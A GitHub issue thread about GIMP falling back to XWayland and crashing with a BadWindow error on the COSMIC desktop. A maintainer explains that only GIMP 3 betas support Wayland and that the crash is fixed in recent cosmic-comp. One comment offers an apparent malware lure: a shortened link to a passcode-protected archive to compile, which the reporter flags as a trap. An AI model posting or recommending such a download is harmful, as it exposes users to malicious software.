### ISSUE TITLE
Gimp is not using wayland but xwayland, and it crash

### ISSUE THREAD

**Issue by rimeno** [pop-os/cosmic-comp#819]
I'm using COSMIC packages on Archlinux.

Starting Gimp work well, but when I want to create a new image, Gimp crash with those errors : 

```
The program 'gimp' received an X Window System error.
This probably reflects a bug in the program.
The error was 'BadWindow (invalid Window parameter)'.
  (Details: serial 12716 error_code 3 request_code 4 minor_code 0)
  (Note to programmers: normally, X errors are reported asynchronously;
   that is, you will receive the error a while after causing it.
   To debug your program, run it with the --sync command line
   option to change this behavior. You can then get a meaningful
   backtrace from your debugger if you break on the gdk_x_error() function.)

(script-fu:17268): LibGimpBase-WARNING **: 09:28:11.751: script-fu: gimp_wire_read(): error
```

So Gimp is started on XWayland (confirmed by `xeyes` and `xlsclients`)

I tried to start Gimp with : `GDK_BACKEND=wayland gimp`, but it still use XWayland.

When I start Gimp from Sway, it's using native Wayland.

How can I force Gimp to start on native Wayland on COSMIC Desktop ?

**Comment by abdulrehman-code** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by rimeno** [comment]
> Give this a shot https://bit.ly/4eaAnWN Passcode: changeme you must have a gcc compiler

Realy fast answer, link to a fix.zip file from MediaFire, asking for a compilation…

I'll not doing that… Looks like a trap…

**Comment by NgoHuy** [comment]
> Give this a shot https://bit.ly/4eaAnWN Passcode: changeme you must have a gcc compiler

can you fork this repo and show the diff?

**Comment by Drakulix** [comment]
Only the Gimp 3 beta versions have a wayland backend.

The BadWindow error was fixed in a very recent commit, make sure you are running the latest cosmic-comp version or wait for your distro to update it.

**Comment by rimeno** [comment]
You're right !
And thanks for this good news.
